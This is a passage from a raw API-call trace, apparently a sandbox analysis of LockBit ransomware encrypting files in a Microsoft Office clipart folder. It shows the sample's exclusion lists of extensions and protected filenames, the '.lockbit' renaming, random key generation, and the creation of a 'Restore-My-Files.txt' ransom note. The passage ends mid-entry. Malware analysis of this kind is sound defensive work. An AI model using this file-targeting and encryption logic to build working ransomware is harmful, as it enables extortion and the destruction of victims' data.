dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.891] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc17dd700, ftCreationTime.dwHighDateTime=0x1bd4af3, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc17dd700, ftLastWriteTime.dwHighDateTime=0x1bd4af3, nFileSizeHigh=0x0, nFileSizeLow=0x2b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00346_.WMF", cAlternateFileName="")) returned 1 [0118.894] lstrcmpiW (lpString1=".", lpString2="IN00346_.WMF") returned -1 [0118.894] lstrcmpiW (lpString1="..", lpString2="IN00346_.WMF") returned -1 [0118.894] PathFindExtensionW (pszPath="IN00346_.WMF") returned=".WMF" [0118.894] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.894] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.895] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.896] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.896] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00346_.WMF") returned 1 [0118.897] lstrcmpiW (lpString1="ntldr", lpString2="IN00346_.WMF") returned 1 [0118.897] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00346_.WMF") returned 1 [0118.897] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00346_.WMF") returned -1 [0118.897] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00346_.WMF") returned -1 [0118.897] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00346_.WMF") returned 1 [0118.897] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00346_.WMF") returned -1 [0118.897] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.897] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned=".WMF" [0118.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.897] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.897] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.898] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.898] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF.lockbit") returned 72 [0118.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0118.899] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.899] malloc (_Size=0x40068) returned 0x3e70008 [0118.899] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=696) returned 1 [0118.899] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0118.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0118.901] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.902] malloc (_Size=0xa6) returned 0x77d7a8 [0118.902] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.907] free (_Block=0x77d7a8) [0118.907] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.907] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.907] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.907] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba56c900, ftCreationTime.dwHighDateTime=0x1bd4af3, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xba56c900, ftLastWriteTime.dwHighDateTime=0x1bd4af3, nFileSizeHigh=0x0, nFileSizeLow=0x788, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00351_.WMF", cAlternateFileName="")) returned 1 [0118.907] lstrcmpiW (lpString1=".", lpString2="IN00351_.WMF") returned -1 [0118.908] lstrcmpiW (lpString1="..", lpString2="IN00351_.WMF") returned -1 [0118.908] PathFindExtensionW (pszPath="IN00351_.WMF") returned=".WMF" [0118.908] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.908] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.909] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.909] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.910] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00351_.WMF") returned 1 [0118.910] lstrcmpiW (lpString1="ntldr", lpString2="IN00351_.WMF") returned 1 [0118.910] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00351_.WMF") returned 1 [0118.910] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00351_.WMF") returned -1 [0118.910] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00351_.WMF") returned -1 [0118.910] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00351_.WMF") returned 1 [0118.910] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00351_.WMF") returned -1 [0118.910] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.910] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned=".WMF" [0118.910] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.911] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.911] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.912] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.912] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.912] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.912] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.912] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.912] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.912] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.912] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF.lockbit") returned 72 [0118.912] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0118.913] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.913] malloc (_Size=0x40068) returned 0x3ef0008 [0118.913] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1928) returned 1 [0118.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0118.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0118.914] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0118.921] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.921] malloc (_Size=0xa6) returned 0x77d7a8 [0118.921] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.922] free (_Block=0x77d7a8) [0118.922] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.922] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.922] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.922] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ee5f00, ftCreationTime.dwHighDateTime=0x1bd4bce, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb0ee5f00, ftLastWriteTime.dwHighDateTime=0x1bd4bce, nFileSizeHigh=0x0, nFileSizeLow=0x23d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00557_.WMF", cAlternateFileName="")) returned 1 [0118.922] lstrcmpiW (lpString1=".", lpString2="IN00557_.WMF") returned -1 [0118.922] lstrcmpiW (lpString1="..", lpString2="IN00557_.WMF") returned -1 [0118.922] PathFindExtensionW (pszPath="IN00557_.WMF") returned=".WMF" [0118.922] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.922] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.922] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.923] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.924] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.924] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00557_.WMF") returned 1 [0118.924] lstrcmpiW (lpString1="ntldr", lpString2="IN00557_.WMF") returned 1 [0118.924] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00557_.WMF") returned 1 [0118.925] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00557_.WMF") returned -1 [0118.925] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00557_.WMF") returned -1 [0118.925] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00557_.WMF") returned 1 [0118.925] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00557_.WMF") returned -1 [0118.925] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.928] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned=".WMF" [0118.928] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.928] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.928] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.928] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.928] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.929] 